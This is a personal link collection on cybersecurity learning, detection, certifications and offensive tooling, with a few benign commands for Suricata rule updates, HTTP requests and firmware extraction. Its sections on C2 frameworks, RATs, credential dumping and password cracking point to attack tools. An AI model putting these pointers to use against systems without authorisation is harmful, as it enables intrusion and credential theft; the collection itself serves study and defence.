Cyber Security

January 9, 2025
December 31, 2022

ssl-tls
web-security
web-authentication

Cyber attack lifecycle/kill chain

Computer security - Wikiwand
Information security - Wikiwand

How do hackers get caught? - the hunt for the hacker. - YouTube
I wouldn’t give this cable to my worst enemy - O.MG Cable - YouTube

What's The Difference Between Cybersecurity Vs Information Security?
Cyber security targets online threats while information security takes a holistic approach.

carpedm20/awesome-hacking: A curated list of awesome Hacking tutorials, tools and resources
onlurking/awesome-infosec: A curated list of awesome infosec courses and training resources.

DEFCONConference - YouTube

NetworkChuck
FREE Security+ SY0-601 // Complete Course // thisisIT 2020 - YouTube
Hacker Skills // OSINT (Information Gathering) - YouTube
Learn Ethical Hacking (CEH Journey) - YouTube

Project Zero
Black Hat | Home
The Daily Swig | Cybersecurity news and views
WhiteHat Security Blog
Blog - Security Research | Akamai
Hacking Articles - Raj Chandel's Blog
InfoSec Write-ups
Jorge Lajara Website
Yealvare – Medium
Dark Reading | Security | Protect The Business
ASecuritySite: When Bob Met Alice – Medium

hak5
Official PCI Security Standards Council Site - Verify PCI Compliance, Download Data Security and Credit Card Security Standards
#1 Crowdsourced Cybersecurity Platform | Bugcrowd

CTF Handbook
What is ired.team notes? | Red Team Notes

0x00sec - The Home of the Hacker
0x00pf/0x00sec_code: Code for my 0x00sec.org posts
Topics - Activity - 0x00pf - 0x00sec - The Home of the Hacker
Topics - Activity - Danus - 0x00sec - The Home of the Hacker

Aif4thah/Dojo-101: Cybersecurity Knowledge Base

Cybersecurity and Its Ten Domains - University System of Georgia | Coursera
Altered Security: Hands-On Enterprise Security and Red Team Labs Windows attacks
Welcome to the Red Canary 2023 Threat Detection Report Windows attacks

The Protection of Information in Computer Systems (PDF)

Feisty Duck: Fine computer security and open source books

Identity eats security: How identity management is driving security | CSO Online detect intrusion beyond authentication

5 Common Methods Hackers Use to Break Into Your Bank Account
10 Ways to Keep a Rogue RasPi From Wrecking Your ...

Palo Alto’s 134-slide presentation reveals the insides of the global cyber market | Ctech market size

Glossaries

Essential IT and Cybersecurity Acronyms Every ITOps Pro Should Know

APT: Advanced Persistent Threat
CISA: Cybersecurity and Infrastructure Security Agency
CISO: Chief Information Security Officer
DEP: Data Execution Prevention (prevent Exploitation)
DFIR: Digital Forensics and Incident Response
EDR: Endpoint Detection and Response
ETDR: Endpoint Threat Detection and Response
IDS: Intrusion Detection System
IPS: Intrusion Prevention System
MSP: Managed Service Provider
MSSP: Managed Security Service Provider
RAT: Remote Administration Tool
RCE: Remote Code Execution
RMM: Remote Management and Monitoring
SDR: Security Detection and Response
SDP: Software Defined Perimeter (in networks)
SIEM: Security Information and Event Management
SOAR: Security Orchestration, Automation and Response
SOC: Security Operation Center
SRAA: Security Risk Assessment & Audit
TTP: Tactics, Techniques, and Procedures (from MITRE ATT&CK)
PPT: People, Process, Technology (MITRE ATT&CK mitigation)
XDR: Extended Detection and Response

Cyber Kill Chain

Cyber Kill Chain® | Lockheed Martin
Cybersecurity Kill Chain Series - YouTube❗!important

The focus of the first 4 stages is PREVENTION.
The focus of the last 3 stages is DETECTION and RESPONSE.

MITRE ATT&CK

MITRE ATT&CK® tactics, techniques, and procedures (TTPs) of adversaries
ATT&CK® Navigator interactive notebook
How to Avoid Messing Up Your Security Program with ATT&CK™

Enterprise Detection & Response: The Pyramid of Pain TTP detection and mitigation is hard to avoid

ATT&CK Matrix: The Enemies Playbook - YouTube
The Anatomy of an Att&ck - YouTube

Putting MITRE ATT&CK™ into Action with What You Have, Where You Are presented by Katie Nickels - YouTube❗!important
Putting MITRE ATT&CK into Action with What You Have, Where You Are | PPT

MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK in 10 Minutes or Less - YouTube
MITRE ATT&CKcon 2018: ATT&CK as a Teacher - YouTube ❗!important

Introduction to STIX
mitre-attack/attack-stix-data: STIX data representing MITRE ATT&CK

Adversary Emulation

Adversary Emulation Plans | MITRE ATT&CK®
ATT&CK® Evaluations

Caldera
mitre/caldera: Automated Adversary Emulation Platform
Using MITRE Caldera to Emulate Threats in Your Environment - YouTube

endgameinc/RTA Red Team Automation (RTA)

Explore Atomic Red Team
redcanaryco/atomic-red-team: Small and highly portable detection tests based on MITRE's ATT&CK.

uber-common/metta: An information security preparedness tool to do adversarial simulation.

mitreattack-python library — mitreattack-python documentation
mitre-attack/mitreattack-python: A python module for working with ATT&CK

03. x33fcon 2018 - Threat-based Purple Teaming with ATT&CK by Chris and Cody from MITRE - YouTube

DevSecOps

What Is DevSecOps?
4 Key Differences Between DevOps and DevSecOps | Boot.dev

Security as Code Protects Rapidly Developing Cloud Native Architectures - The New Stack
Product | Security as Code - oak9

DevSecOps Tools | Atlassian

Incidence Response

Best Practices for Preparing for a Cyber Breach
After a Cyber Incident: Guide To CISO Career Protection
Footprints » Linux Magazine

After My Data Was Breached, Here's How I Protected My Accounts

Learning/Courses/Videos

Free Courses That Are Actually Free: Cybersecurity Edition - KDnuggets
Which Platform Is Better: TryHackMe or Hack The Box? - YouTube

Yeah Hub - Kali Linux Tutorials | Tech News | SEO Tips and Tricks
yeahhub/Hacking-Security-Ebooks: Top 100 Hacking & Security E-Books (Free Download)
yeahhub/Kali-Linux-Ebooks: Top 20 Kali Linux Related E-books (Free Download)

TryHackMe | Cyber Security Training
TryHackMe! Basic Penetration Testing - YouTube

Hack The Box: Hacking Training For The Best | Individuals & Companies
hack the box - YouTube

An Interactive Cyber Security Platform | Defend the Web originally HackThis!!

OverTheWire: Wargames

Yizheng's Homepage
hacksplaining - Lessons

HackTricks ❗!important
Hack Smarter
Hack This Site
ThisisLegal.com - Are You?

Red Team Development and Operations | Red Team Development and Operations

Dashboard | HackerRank

The Defenders Movie | Cybersecurity Documentary
Douglas Crockford: Principles of Security - YouTube
The Lazy Programmer's Guide to Secure Computing - YouTube
An Overview of the Security Ecosystem in Programming - via @codeship | via @codeship
Transitioning Into a Penetration Testing Role | Schellman

3 FREE Resources for Cyber Defenders - YouTube
The DFIR Report - Real Intrusions by Real Attackers, The Truth Behind the Intrusion real world attack reports

Free Courses That Are Actually Free: Cybersecurity Edition - KDnuggets
edX: Try It: Ethical Hacking | edX
RITx: Cybersecurity Fundamentals | edX
CurtinX: Cybersecurity and Privacy in the IoT | edX

Ethical Hacking Full Course - Learn Ethical Hacking in 10 Hours | Ethical Hacking Tutorial | Edureka - YouTube

HackOvert - YouTube
InsiderPhD - YouTube
IppSec - YouTube HackTheBox
John Hammond - YouTube JohnHammond - GitHub
HackerOne - YouTube
MalwareTech - Everything Cyber Security the guy who disabled WannaCry
Marcus Hutchins - YouTube
mitrecorp - YouTube
NetworkChuck - YouTube
The CISO Perspective - YouTube
Tyler Ramsbey || Hack Smarter - YouTube
webpwnized - YouTube
x33fcon - YouTube

Jack Rhysider - YouTube hacker story

Pentester Academy TV - YouTube also on embedded Linux
PentesterAcademy Labs - YouTube

jhaddix - YouTube
Jason Haddix - Bug Hunter's Methodology (Series) - YouTube

thehackerish - YouTube
Web hacking training [hands-on] - YouTube
Live hacking sessions - YouTube

David Bombal - YouTube
The best Hacking Courses & Certs (not all these)? Your roadmap to Pentester success. - YouTube
2023 Roadmap to Master Hacker - YouTube
Real World Hacking Demo with OTW - YouTube

Juniper Networks Training Course Catalog free courses
Get Started with Free Juniper Training

qwqdanchun RED team, releasing attack tools
恶意软件学习笔记 - Malware Note

Certifications

Comptia Sec+, Cysa+, CASP are all respectful certifications but Pentest+ ... won't teach you how to pen test.

Cyber Security Certificate Tier List - YouTube

Course Specific Resources for Offsec Students – OffSec Support Portal

Cybersecurity Certifications | Information Security Certifications | ISC2

10 Popular Cybersecurity Certifications [2025 Updated] | Coursera
Your Ultimate Guide to Cybersecurity Certifications
What Is OSCP Certification and Is it Worth It? 2025 Guide | Coursera

Google Cybersecurity Certificate - Grow with Google
Google Cybersecurity Professional Certificate | Coursera

Offensive Security Web Expert (OSWE)

OSWE Exam FAQ – OffSec Support Portal

WEB-300: Advanced Web Application Security Certification | OffSec
WEB-300: Advanced Web Attacks and Exploitation OSWE Exam Guide – OffSec Support Portal

The OSWE Review and Exam Preparation Guide | Schellman
OSWE Review - Tips & Tricks (Offensive Security Web Expert) - YouTube

Foundational Web Application Assessments with Kali Linux (OSWA)

WEB-200: Foundational Web Application Assessments with Kali Linux (OSWA) Exam Guide – OffSec Support Portal
OSWA Exam FAQ – OffSec Support Portal

WEB-200: Foundational Web Application Assessments with Kali Linux | OffSec
Web Attacks with Kali Linux (WEB-200) – OffSec Support Portal

OffSec Certified Professional (OSCP)

hard

What Is OSCP Certification and Is it Worth It? 2025 Guide | Coursera

PEN-200: Penetration Testing Certification with Kali Linux | OffSec
Penetration Testing with Kali Linux (PEN-200) – OffSec Support Portal

OffSec Advanced Evasion Techniques and Breaching Defenses (OSEP)

OSEP Exam Guide – OffSec Support Portal
OSEP Exam FAQ – OffSec Support Portal

PEN-300: Advanced Penetration Testing Certification | OffSec
Evasion Techniques and Breaching Defenses (PEN-300) – OffSec Support Portal

OSEP PEN-300 Course Review | Schellman

OffSec Foundational Wireless Network Attacks (OSWP)

OSWP Exam Guide – OffSec Support Portal
OSWP Exam FAQ – OffSec Support Portal

(PEN-210) Foundational Wireless Network Attacks FAQ – OffSec Support Portal

Certified Information Systems Security Professional (CISSP)

CISSP - Certified Information Systems Security Professional | ISC2

Get CISSP Certified: A Self-Study Guide to Success | Schellman

CompTIA Security+

https://www.comptia.org/certifications/security
Attention Required! | Cloudflare

Certified Ethical Hacker (CEH)

some comments EC Council is trash

CEH Certification | Ethical Hacking Training & Course | EC-Council
Certified Ethical Hacker Online Training | CEH Training

Burp Suite Certified Practitioner

Burp Suite Certified Practitioner | Web Security Academy - PortSwigger
How the Burp Suite Certified Practitioner exam process works | Web Security Academy - PortSwigger

The Burp Suite Certified Practitioner Exam: A Review | Schellman

CTF/Labs

CTFtime.org / All about CTF (Capture The Flag)

Bienvenue [Root Me : plateforme d'apprentissage dédiée au Hacking et à la Sécurité de l'Information]

Pay What You Can – Antisyphon Training pay what you can, free tier available

Pentester Academy's AttackDefense Lab
PentesterAcademy Labs - YouTube
Pentester Academy Blog

Cybersecurity Labs (FOR FREE) - Linux Backdoor Analysis - YouTube
IntroLabs/IntroClassFiles/navigation.md at master · strandjs/IntroLabs
ClassLabs/navigation.md at main · strandjs/ClassLabs

Ne0Lux-C1Ph3r/WRITE-UP: Write up CTF

Introduction · CTF Field Guide source
trailofbits/ctf-challenges: CTF Challenges

CTF 2023 - Capture the Flag Challenge

Fetch the Flag
Getting started with CTF | Snyk
Snyk | Capture the Flag Workshop
Fetch the Flag CTF 2023 | Snyk

picoCTF - CMU Cybersecurity Competition
picoCTF - Learning Resources
The CTF Primer

Katana - Automatic CTF Challenge Solver — Katana 1.0 documentation
JohnHammond/katana: Katana - Automatic CTF Challenge Solver in Python3
RsaCtfTool/RsaCtfTool: RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data

JohnHammond/ctf-katana: This repository aims to hold suggestions (and hopefully/eventually code) for CTF challenges. The "project" is nicknamed Katana. the concept
JohnHammond/labs: Free and publicly available training labs and exercises, for quick copy-and-paste demonstrations, learning and education.

Google CTF
PwnFunction - YouTube
LiveOverflow - YouTube

I Hacked & Exposed This Evil Website for Educational Purposes. - YouTube

Detection and Response

What is XDR vs EDR vs MDR? Breaking down Extended Detection and Response - YouTube
EDR, MDR & XDR Explained - YouTube
SIEM, EDR, XDR, MDR & SOAR | Cybersecurity Tools and Services | Threat Monitoring - YouTube

Detection

No, Your Antivirus Doesn't Need to Be Open Source—Here's Why

Security Onion Solutions
Security-Onion-Solutions/securityonion: Security Onion is a free and open platform for threat hunting, enterprise security monitoring, and log management. It includes our own interfaces for alerting, dashboards, hunting, PCAP, detections, and case management. It also includes other tools such as osquery, CyberChef, Elasticsearch, Logstash, Kibana, Suricata, and Zeek.

EQL Analytics Library — EQL Analytics Library documentation

OTRF/ThreatHunter-Playbook: A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.

atc-project/atomic-threat-coverage: Actionable analytics designed to combat threats

Sigma - SIEM Detection Format | The shareable detection format for security professionals.
SigmaHQ/sigma: Main Sigma Rule Repository
SigmaHQ/sigma-cli: The Sigma command line interface based on pySigma

YARA - The pattern matching swiss knife for malware researchers
Welcome to YARA’s documentation!
matonis/yara_tools: Create an entire YARA rule via Python? Whhhhhhaatttt?
Applied YARA training
yara Archives | APNIC Blog
Classify Malware with YARA - YouTube
Classify Malware with YARA - YouTube

VirusTotal
API Scripts and client libraries – VirusTotal
Compliant, easy and actionable integration of VirusTotal in 3rd-party products - Welcome VT Augment ~ VirusTotal Blog

SwiftOnSecurity/sysmon-config: Sysmon configuration file template with default high-quality event tracing
cisagov/LME: Logging Made Easy (LME) is a free and open logging and protective monitoring solution serving all organizations.

Cyber Threat Intelligence

Using MITRE allows to:

Groups | MITRE ATT&CK®
The Cycle of Cyber Threat Intelligence - YouTube

Cyber Threat Intelligence Technical Committee
STIX 2 and TAXII 2 are JSON and RESTful API friendly.
Introduction to STIX serialization format
Introduction to TAXII protocol for data exchange

Trusted Automated eXchange of Indicator Information (TAXII™) | TAXII Project Documentation 1.x

Server and client (support up to 1.1 of the TAXII standard)
OpenTAXII documentation
eclecticiq/OpenTAXII: TAXII server implementation in Python from EclecticIQ
Cabby documentation
eclecticiq/cabby: TAXII client implementation from EclecticIQ

Hyperscale ML threat intelligence for early detection & disruption | Microsoft Community Hub
Simplify your SOC with Rob Lefferts and Allie Mellen
[2411.06239] Web Scale Graph Mining for Cyber Threat Intelligence

Endpoint Detection and Response (EDR)

AURORA Agent - Nextron Systems
Aurora Agent User Manual — Aurora Agent User Manual documentation
sigma/rules at master · SigmaHQ/sigma

Detect Hackers & Malware on your Computer (literally for free) - YouTube

Extended Detection and Response (XDR)

#Wazuh

IDS/IPS

Snort - Network Intrusion Detection & Prevention System

The Zeek Network Security Monitor
Zeek Documentation — Book of Zeek
zeek/zeek: Zeek is a powerful network analysis framework that is much different from the typical IDS you may know.

CrowdSec - The open-source & collaborative security suite
How to Install and Configure CrowdSec on OPNsense

Suricata

Home - Suricata
IPS inline mode

11. Performance — Suricata documentation

Rules parsers:
m-chrome/py-suricataparser: Pure python parser for Snort/Suricata rules.
m-chrome/go-suricataparser: Golang Suricata/Snort rules parser and generator
theY4Kman/parsuricata: Parse Suricata rules lark grammar, parse ports

Name: et/open
  Vendor: Proofpoint
  Summary: Emerging Threats Open Ruleset
  License: MIT
Name: et/pro
  Vendor: Proofpoint
  Summary: Emerging Threats Pro Ruleset
  License: Commercial
  Replaces: et/open
  Parameters: secret-code
  Subscription: https://www.proofpoint.com/us/threat-insight/et-pro-ruleset
Name: oisf/trafficid
  Vendor: OISF
  Summary: Suricata Traffic ID ruleset
  License: MIT
Name: ptresearch/attackdetection
  Vendor: Positive Technologies
  Summary: Positive Technologies Attack Detection Team ruleset
  License: Custom
Name: scwx/enhanced
  Vendor: Secureworks
  Summary: Secureworks suricata-enhanced ruleset
  License: Commercial
  Parameters: secret-code
  Subscription: https://www.secureworks.com/contact/ (Please reference CTU Countermeasures)
Name: scwx/malware
  Vendor: Secureworks
  Summary: Secureworks suricata-malware ruleset
  License: Commercial
  Parameters: secret-code
  Subscription: https://www.secureworks.com/contact/ (Please reference CTU Countermeasures)
Name: scwx/security
  Vendor: Secureworks
  Summary: Secureworks suricata-security ruleset
  License: Commercial
  Parameters: secret-code
  Subscription: https://www.secureworks.com/contact/ (Please reference CTU Countermeasures)
Name: sslbl/ssl-fp-blacklist
  Vendor: Abuse.ch
  Summary: Abuse.ch SSL Blacklist
  License: Non-Commercial
Name: sslbl/ja3-fingerprints
  Vendor: Abuse.ch
  Summary: Abuse.ch Suricata JA3 Fingerprint Ruleset
  License: Non-Commercial
Name: etnetera/aggressive
  Vendor: Etnetera a.s.
  Summary: Etnetera aggressive IP blacklist
  License: MIT
Name: tgreen/hunting
  Vendor: tgreen
  Summary: Threat hunting rules
  License: GPLv3
sudo suricata-update enable-source osif/trafficid
sudo suricata-update enable-source ptresearch/attackdetection
sudo suricata-update   # Do not forget to update rules after activating source

SELKS by Stamus Networks
StamusNetworks/SELKS: A Suricata based IDS/IPS/NSM distro

Aristotle Documentation
secureworks/aristotle

EveBox | EveBox Suricata EVE JSON viewer

StamusNetworks/scirius: Scirius is a web application for Suricata ruleset management and threat hunting.

Dataset

20. Public Data Sets — Suricata documentation

Malware Capture Facility Project — Stratosphere IPS

Wazuh

Wazuh · The Open Source Security Platform
Wazuh documentation
Wazuh GitHub Org
wazuh/wazuh-ruleset: Wazuh - Ruleset

Improve your security posture with Wazuh, a free and open source XDR
you need this FREE CyberSecurity tool - YouTube

Supply Chain Attack

copyright-open-source#Software BOM (bill of material)

Open Source & Software Supply Chain Risks Blog | Synopsys
Snyk Vulnerability Database | Snyk

npm audit: Broken by Design — Overreacted audit tools should not cause noise

Social Engineering

7 Types of Phishing Attacks You Should Know About

OT security

What is Operational Technology (OT) Security? - Cisco

Securing OT Networks: Strategies and Best Practices | OTORIO
Best Practices for Operational Technology (OT) Security | OTORIO

Products - ISA/IEC-62443-3-3: What is it and how to comply? - Cisco
Guide to Operational Technology (OT) Security NIST.SP.800

Cybersec Tools

The Tool Box - YouTube
19 open source GitHub projects for security pros | InfoWorld

penetration testing - freeCodeCamp.org
Tib3rius/Pentest-Cheatsheets

Conduct a Penetration Test Like a Pro in 6 Phases [Tutorial] - YouTube

Commando VM: The First of Its Kind Windows Offensive Distribution | Mandiant | Google Cloud Blog

Soldie/Yuki-Chan-The-Auto-Pentest

Goby— 资产绘测及实战化漏洞扫描工具 asset scan, PoC
MY0723/goby-poc: 451个goby poc,是否后门及重复自行判断,来源于网络收集的Goby&POC,不定时更新。
D-Haiming/gobypoc: This repository comes from an Internet collection

swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF

DMitry - Deepmagic Information Gathering Tool
godaddy/procfilter: A YARA-integrated process denial framework for Windows
The Bro Network Security Monitor

fortra/impacket: Impacket is a collection of Python classes for working with network protocols. ❗!important

mostaphabahadou/postenum: A lightweight, portable, and modular tool for Linux enumeration and privilege escalation.

hping3 | Kali Linux Tools
hping3(8) - Linux man page

trustedsec/ptf: The Penetration Testers Framework (PTF) is a way for modular support for up-to-date tools.

Home - Open Source Security Foundation
Who we are and what we do | The Hacker’s Choice

pr4jwal/quick-scripts: A collection of my quick and dirty scripts for vulnerability POC and detections
CISOfy/lynis: Lynis - Security auditing tool for Linux, macOS, and UNIX-based systems. Assists with compliance testing (HIPAA/ISO27001/PCI DSS) and system hardening. Agentless, and installation optional.

GAUNTLT - Go Ahead, Be Mean To Your Code - Security and Rugged Testing
gauntlt/gauntlt: a ruggedization framework that embodies the principle "be mean to your code"

AC-Hunter™ - Active Countermeasures free community edition
Network Threat Hunting Made Easy (Finding Hackers) - YouTube

activecm/rita: Real Intelligence Threat Analytics (RITA) is a framework for detecting command and control communication through network traffic analysis.

KASM

Kasm Workspaces | The Container Streaming Platform

Kasm Workspaces: Your Solution for Remote Desktops? Full Review! - YouTube
create the ULTIMATE hacking lab in 5min!! (Docker Containers STREAMING Kali Linux to your browser) - YouTube

Kali Linux

kali-linux - LinuxServer.io dockerized Kali accessed via VNC

Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution
Kali Tools | Kali Linux Tools
Introduction to Kali Linux - GeeksforGeeks

kali-tweaks

An introduction to Kali Linux - Help Net Security
5 Kali Linux tools you should learn how to use - Help Net Security
University of Kali Linux - YouTube

seclists | Kali Linux Tools

Und3rf10w/kali-anonsurf: A port of ParrotSec's stealth and anonsurf modules to Kali Linux send all traffic via Tor network

介紹 | 大学霸 Kali Linux 安全渗透教程

Official Kali Linux Docker Images | Kali Linux Documentation no services installed
artis3n/kali-artis3n: A kalilinux/kali-rolling container with extra juice.
blairjames/kali-ready-to-roll: The latest kali-rolling with kali-linux-headless and wordlists installed.

Kali Linux NetHunter

for Android

What is Kali NetHunter for Android? | Simplilearn

BlackArch

BlackArch Linux - Penetration Testing Distribution
BlackArch/blackarch: An ArchLinux based distribution for penetration testers and security researchers.

Parrot Security OS

Parrot Security
What is Parrot Security OS? Features & Installation | Simplilearn

Metasploit

Penetration Testing Software | Metasploit

How to Hack Like a Pro: Getting Started with Metasploit « Null Byte :: WonderHowTo
Metasploit — A Walkthrough Of The Powerful Exploitation Framework

Metasploit For Beginners | What is Metasploit Explained | Metasploit Basics Tutorial | Simplilearn - YouTube
Penetration Testing with Metasploit: A Comprehensive Tutorial - YouTube

GOSINT

ciscocsirt/GOSINT: The GOSINT framework is a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs). 🗃️archived
Welcome to GOSINT’s documentation! — gosint 0.0.1 documentation

GOSINT: A framework for collecting, processing, and exporting IOCs

Jok3r

Jok3r v3 - Network & Web Pentest Automation Framework
koutto/jok3r: Jok3r v3 BETA 2 - Network and Web Pentest Automation Framework

Jok3r: A Framework for Automated Network and Web Penetration Testing

Vulnerability scanner

13 Online Vulnerability Scanning Tools to Scan your Website Security
Vulnerability Scans and False Positives

OpenVAS - Open Vulnerability Assessment Scanner
Greenbone Community Documentation
greenbone/openvas-scanner: This repository contains the scanner component for Greenbone Community Edition.

Install Nessus for Free and scan for Vulnerabilities (New Way) - YouTube Nessus Essentials
Best FREE Vulnerability Scanner: Nessus Vs OpenVAS (Greenbone) - YouTube
Tenable Nessus Essentials Vulnerability Scanner | Tenable®

Attack Tool Kit / Introduction
411Hall/JAWS: JAWS - Just Another Windows (Enum) Script
carlospolop/PEASS-ng: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)
rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks

Linux Privilege Escalation with LinEnum | by Trevor Cohen | Medium

trufflesecurity/trufflehog: Find credentials all over the place
RhinoSecurityLabs/pacu: The AWS exploitation framework, designed for testing the security of Amazon Web Services environments.

Measuring Vulnerability Scanner Quality with Grype and Yardstick | Anchore
anchore/yardstick: Compare vulnerability scanners results (to make them better!)

SCARLETEEL: Operation leveraging Terraform, Kubernetes, and AWS for data theft – Sysdig

Honeypot

paralax/awesome-honeypots: an awesome list of honeypot resources

[PDF] An Extensive Study of Honeypot Technique | Semantic Scholar
[PDF] Honeypot as the Intruder Detection System | Semantic Scholar
(PDF) Flow based containerized honeypot approach for network traffic analysis: An empirical study

Kippo - SSH Honeypot
Project Heisenberg
GHH - The "Google Hack" Honeypot
NozomiNetworks/pywinbox

Building an IoT Honeypot in 5 Steps

telekom-security/tpotce: 🍯 T-Pot - The All In One Honeypot Platform 🐝
tpotce v22.04.0 releases: The All In One Honeypot Platform • Penetration Testing
30 天蜜罐品嘗 :: 第 11 屆 iThome 鐵人賽

HoneyTrap | HoneyTrap
honeytrap/honeytrap: Advanced Honeypot framework.

lyrebird/honeypot-base - Docker Image | Docker Hub uses mitmproxy to capture SSH traffic

Honeynet Project

The Honeynet Project
The Honeynet Project GitHub Org

Glutton 1.0 Release
mushorg/glutton: Generic Low Interaction Honeypot
honeynet/ochi UI for events from Glutton

kung-foo/freki: Freki is a tool to manipulate packets in usermode using NFQUEUE and golang.

Reconnaissance

shell-network#nmap

Real World Hacking Tools Tutorial (Target: Tesla) - YouTube
Open Source Intelligence (OSINT)

BuiltWith Technology Lookup GA code lookup
Shodan Search Engine infrastructure lookup
WHOIS API | WHOIS Lookup API | Domain WHOIS API reverse WHOIS
Home • Directory Lister
TLS cert scan on AWS IP

OJ/gobuster: Directory/File, DNS and VHost busting tool written in Go

Naked IP without DNS

Use Host: in HTTP request to mock the host header

xh --verify no --print hHbB https://42.200.27.32/ "HOST:www1.ha.org.hk"
xh --verify no --print hHbB https://42.200.27.32/

Pivoting/Tunneling/Proxy

Detection Evasion

ssh#SSH Tunneling
Tunneling Through Protected Networks | Master Network Pivoting - YouTube

Chisel

reverse tunnel, socks proxy

jpillora/chisel: A fast TCP/UDP tunnel over HTTP
How To Pivot Through a Network with Chisel - YouTube

Pivoting with Chisel | Ap3x Security
Pivoting with Chisel

PayloadsAllTheThings/Methodology and Resources/Network Pivoting Techniques.md at master · swisskyrepo/PayloadsAllTheThings

proxychains

CLI command wrapper

haad/proxychains: proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy. Supported auth-types: "user/pass" for SOCKS4/5, "basic" for HTTP.
rofl0r/proxychains-ng: proxychains ng (new generation) - a preloader which hooks calls to sockets in dynamically linked programs and redirects it through one or more socks/http proxies. continuation of the unmaintained proxychains project. the sf.net page is currently not updated, use releases from github release page instead.
How do those hackers' tools work? Proxychains - Programming - 0x00sec - The Home of the Hacker
2.4 设置 ProxyChains | 大学霸 Kali Linux 安全渗透教程

learning hacking? DON'T make this mistake!! (hide yourself with Kali Linux and ProxyChains) - YouTube

Browser

FoxyProxy - Home
FoxyProxy Standard
FoxyProxy Standard – Get this Extension for 🦊 Firefox (en-US)

Exploitation

Exploitation to gain access/execute code after gaining access

see #Buffer Overflow, #Process Injection

Previlage Escalation

GTFOBins

PrintSpoofer
Godpotato

linpeas | grimbins
PEASS-ng/linPEAS at master · carlospolop/PEASS-ng

PEASS-ng/winPEAS at master · carlospolop/PEASS-ng

TryHackMe! Abusing SETUID Binaries - Vulnversity - YouTube

C2 Server

Havoc
HavocFramework/Havoc: The Havoc Framework.

Sliver | Bishop Fox
BishopFox/sliver: Adversary Emulation Framework
HTTP(S) C2 · BishopFox/sliver Wiki
Sliver C2 — Modern Command and Control Exploitation Framework | by Yua Mikanana | Sep, 2023 | Medium

Global Socket | Connect like there is no firewall. Securely.
hackerschoice/gsocket: Connect like there is no firewall. Securely. gs-netcat

ldcsaa/HP-Socket: High Performance TCP/UDP/HTTP Communication Component

Remote Access Tool (RAT)

Remcos | Remote Control & Surveillance Software

quasar/Quasar: Remote Administration Tool for Windows

Password Hacking

web-authentication#Active Directory

Password Hacking in Kali Linux - YouTube

Hacking Complex Passwords with Rules & Munging - YouTube

Password Dumping

Credential Access

ParrotSec/mimikatz Windows
Mimikatz: everything you need to know | NordVPN
Mimikatz - Red Canary Threat Detection Report

outflanknl/Dumpert: LSASS memory dumper using direct system calls and API unhooking. Windows

dump hashes
impacket/examples/secretsdump.py at master · fortra/impacket · GitHub

Hydra

ssh brute force

hydra | Kali Linux Tools
SSH Password Testing With Hydra on Kali Linux - Linux Tutorials - Learn Linux Configuration
How to Use Hydra  to Hack Passwords – Penetration Testing Tutorial

Hydra - SSH BruteForce - YouTube
How to HACK Website Login Pages | Brute Forcing with Hydra - YouTube

John The Ripper

John the Ripper documentation
How to Crack Passwords using John The Ripper – Pentesting Tutorial

Dictionary attack

cupp: generate passwords dictionary
how to HACK a password // Windows Edition - YouTube

Hashcat: dictionary attack
how to HACK a password // password cracking with Kali Linux and HashCat - YouTube

Zero Trust Network

vpn#Tailscale
vpn#Twingate

IP address, network id
Workload id, service id

Zero Trust: Time to Get Rid of Your VPN – The New Stack
ZTNA: What is Zero Trust Network Access? | Twingate
Why zero-trust models should replace legacy VPNs
Zero Trust Maturity Model | CISA
The Death of the Corporate Network
Architecting Network Connectivity for a Zero Trust Future | Twingate
Why Access Management Is Step One for Zero Trust Security – The New Stack

Guest Blog: k8s tunnels with Kudelski Security

What is Zero Trust Network Access (ZTNA)? The Zero Trust Model, Framework and Technologies Explained - YouTube
Accomplishing Zero Trust Security Using SDP - YouTube

Zero Trust Network Access (ZTNA) vs Virtual Private Networking (VPN) - YouTube
What is Zero Trust (And How To Accelerate Your Strategy) - YouTube

How To Implement Zero-Trust Security in Linux Environments

OpenZiti

OpenZiti - Open Source Zero Trust Networking
OpenZiti
OpenZiti Test Kitchen

openziti-test-kitchen/zssh: Ziti SSH
Zero Trust SSH Client Explained

SPIFFE

SPIFFE – Secure Production Identity Framework for Everyone
spiffe/spiffe: The SPIFFE Project

SPIFFE in a Nutshell - Pushpalanka Jayawardhana - Medium
Sunil James, CEO of Scytale, Explains SPIFFE - The New Stack

Wireless

Wifi

3 Levels of WiFi Hacking - YouTube NetworkChuck

Aircrack-ng
aircrack-ng/aircrack-ng: WiFi security auditing tools suite

Wifiphisher - The Rogue Access Point Framework
wifiphisher/wifiphisher: The Rogue Access Point Framework

Air Gap attacks

Home | Air Gap Research Page
new attack leaks secrets using RAM as a radio - YouTube

Cybersec Hardwares

Embedded Systems

Hardware Hacking: UART Magic with Alxhh | Bugcrowd
Breaking into an Embedded Linux System eBook QEMU setup

Make Me Hack - YouTube QEMU and hardware hacking
Matt Brown - YouTube IoT hacking

How We Hacked a TP-Link Router and Took Home $55,000 in Pwn2Own - YouTube
Hacker's Guide to UART Root Shells - YouTube
US Government to BanTP-Link Devices - Live Hacking of a Chinese WiFi Router - YouTube

this can't be real. - YouTube bug in MediaTek SDK
4 exploits, 1 bug: exploiting CVE-2024-20017 4 different ways | hyprblog
Critical Exploit in MediaTek Wi-Fi Chipsets: Zero-Click Vulnerability (CVE-2024-20017) Threatens Routers and Smartphones | SonicWall

Hacking an AT&T 4G Router For Fun and User Freedom - YouTube using uboot CLI, dump config partition

4 exploits, 1 bug: exploiting CVE-2024-20017 4 different ways | hyprblog

Introduction to Firmware Reversing - YouTube
Intro to Hardware Reversing: Finding a UART and getting a shell - YouTube
this is my favorite hardware hacking tool - YouTube firmware dump

  1. Download firmware image
  2. binwalk -Me ${image}
  3. Look for jffs2 (extract with jefferson) or squashfs

Flipper Zero

Flipper Zero — Portable Multi-tool Device for Geeks
flipperdevices/flipperzero-firmware: Flipper Zero firmware source code

Talking Sasquach - YouTube
Flipper Zero Videos - YouTube

Flipper Zero - Starter Guide - YouTube
Flipper Zero - A Hackers Review - YouTube

